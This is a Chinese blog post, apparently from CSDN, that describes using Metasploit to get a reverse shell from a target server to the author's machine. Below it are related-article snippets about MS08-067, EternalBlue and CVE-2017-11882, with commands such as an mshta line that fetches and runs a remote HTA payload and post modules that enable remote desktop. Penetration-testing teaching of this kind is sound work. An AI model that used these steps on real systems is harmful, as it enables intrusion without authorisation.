metasploit 远程连接服务器

最新推荐文章于 2024-10-31 17:24:47 发布
原创 最新推荐文章于 2024-10-31 17:24:47 发布 · 2.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #渗透

本文详细介绍使用Metasploit框架进行渗透测试的过程。从配置本机IP到利用相应模块生成并运行代码,最终成功获取目标机的shell权限,实现远程控制。

目标ip:192.168.0.101

本机ip:192.168.0.104

打开metasploit

找到到相应的模块,因为我也记不住这个模块,所以先搜索相关的在查找。

找到相应的模块

进入该模块

查看完整的配置信息

这里必要的配置,只有一个,那就是本机ip。因为要在服务器上运行,并连接本机ip。

运行,得到相应的代码。

在服务器的命令行下运行这段代码

如果本机上显示session,就代表连接成功。

在本机输入 sessions 查看session。可以看到目标机将shell转发到了本机的4444端口上

输入sessions开始连接

查看ip,验证是否连接成功

可以看到ip地址,已经是目标机的ip地址。



CVE_2017_11882漏洞复现(Metasploit开启NT远程桌面添加账户)
cainsoftware的博客
07-05 356
靶机安装windows office 2016 2.rb复制文件到攻击机的msf的模块文件下并刷新 这里注意:msf放到库文件下 不能用- 只能用下划线 _ 不然刷新库 不认 3.设置参数 运行并生成 木马doc 4.运行监听 靶机执行木马 注意: 这边连接后并不会直接回显,需要用seesions –i 1的方式来链接反弹 5.开启远程桌面 run post/windows/manage/enable_rdp 6.添加远程桌面密码run pos...
使用Metasploit 获取远程 shell
Hdvsns的博客
06-23 386
MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。(5)mshta.exe是用于负责解释运行HTA文件的Windows OS实用程序·可以运行javascript或VBScript的HTML文件,在win7靶机中打开cmd窗口。输入命令:mshta.exe http://192.xxx.xx.xx(kali的IP):8888/xxx(hta文件名).hta。Metasploit远程控制模块。
利用msf进行内网的木马渗透详细教程
m0_52332592的博客
11-11 4532
内网渗透木马测试
使用msf复现ms17-010永恒之蓝
meditate的博客
03-04 5395
**** 复现永恒之蓝**** 一,准备工作: 1. kali系统: 可以直接装在物理机上,也可以装在VMware虚拟机上。(个人推荐装在虚拟机上) 2. 信息收集工作: 1)获取目标机地址:192.168.1.68 我在这里用的是win7的虚拟机,查找win7的IP:按下win+R后输入cmd进入终端,输入ipconfig查看IP地址。 2)获取攻击机地址:192.168.1.6 这里指kali...
Metasploit msfd插件实现远程访问msf
ropin_os的专栏
03-18 4230
linux下:        //进入msfd sudo msfd //打开连接 msfd -a -P //查看端口是否打开 netstat -tn //远程连接msf nc windows下://打开连接 msf> load msfd ServerName=你的IP地址 ServerPort=你的端口 //查看连接 netstat -na //访问使用telnet telnet   window下可能会出现乱码,这里推荐使用一款开源的软件 putty,附上简单的使用说
简单远程控制 Metasploit应用
m0_62659165的博客
11-22 444
简单远程控制 Metasploit应用
Metasploit渗透测试实战技巧:Metasploit远程主机横向渗透技巧
# 1. 简介 ## 1.1 Metasploit渗透测试概述 Metasploit是一个开源的渗透测试框架,它提供了...远程主机横向渗透是指在已经成功入侵了一个或多个远程主机之后,通过横向移动来渗透其他主机或系统的技术手段。通常情况下
Metasploit渗透测试之在云服务器中使用MSF
YJ_12340的博客
10-31 1162
随着云计算的发展,对基于云的应用程序、服务和基础设施的测试也在不断增加。在对云部署进行渗透测试时,最大的问题之一是共享所有权。过去,在进行渗透测试时,企业会拥有网络上的所有组件,我们可以对它们进行全部测试;而在云环境中,根据部署和服务模式的不同,我们的测试范围可能非常有限。provider(提供商)是构建云部署的实体,它向一个或多个tenants(租户)提供服务;租户是与提供商签订服务合同的人。
metasploit
12-19
该命令将创建一个Windows Meterpreter reverse_tcp类型的payload,该payload将自动连接IP地址为192.168.3.12、端口号为4444的服务器,并且每5秒尝试一次连接。此外,该payload将在目标系统启动时自动运行。 #### ...
Metasploit远程代码执行
小飞鸟
11-02 1107
Metasploit远程代码执行 本次漏洞利用的是ms08-067的XP漏洞 metasploit下进行操作 search 08-067            -->搜索漏洞相关的模块,得到exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/ms08_067_netapi        -->使用这个漏洞模块...
今天简单黑一下室友电脑MSF提权开启远程桌面并连接
kjuhfkicf154的博客
01-04 4115
今天简单黑一下室友电脑~
记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面。
随心所欲不逾矩
02-27 1021
前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境部署一个Windows7系统,在这个系统上把finecms这个应用部署上去。把finecms安装之后,和客户沟通,把这个应用的地址映射到公网上去。2,其次,没有条件的话,自己在在wmware上装个虚拟机部署上去也行。
MSF远程登录实验
坏坏-5的博客
04-13 3887
本篇是关于使用MSF工具远程控制桌面实验笔记!
作为内网杀手的metasploit如何在外网使用呢?
qq284489030的博客
05-09 5382
经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢? 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧! 经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?…… 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧! 什么是内网?内网接入方...
msf如何在外网使用
hwb123458的博客
08-11 2551
1: 我们先打开网址:www.ngrok.cc进入ngrok的内网穿透网站,然后点击注册按钮 2: 注册大家都会吧,我就不多讲了好吧 3: 登录 4: 点击隧道管理,上面那个教程想看就去看吧 5: 点击开通隧道 6: 往下拉 7: 点击这个不要钱的(咋地,白嫖它不香吗???) 8: 这个不会要我讲吧 9: 自己看图 10: 看图 11: 点击客户端下载 12: 选择Linux,因为我们的kali就是Linux系统的,32位也行,这要看你的系统,这里我选的是64位 13: 打开我们的kali
【工具使用】——Metasploit(MSF)使用详解(超详细),2024年最新腾讯网络安全面试必问_msf关闭杀软
2401_84972980的博客
05-13 1988
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
msf拿下windows的远程桌面
mulincong的博客
05-25 1173
msf拿下windows的远程桌面
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 6370
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
使用kali远程入侵物理服务器教程
最新发布
09-24
使用Kali系统进行远程入侵仅可用于合法的渗透测试和安全研究,严禁用于非法活动。以下是一个大致的使用Kali系统远程入侵...当目标服务器运行木马程序后,Kali系统会收到连接,从而实现对目标服务器远程控制 [^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值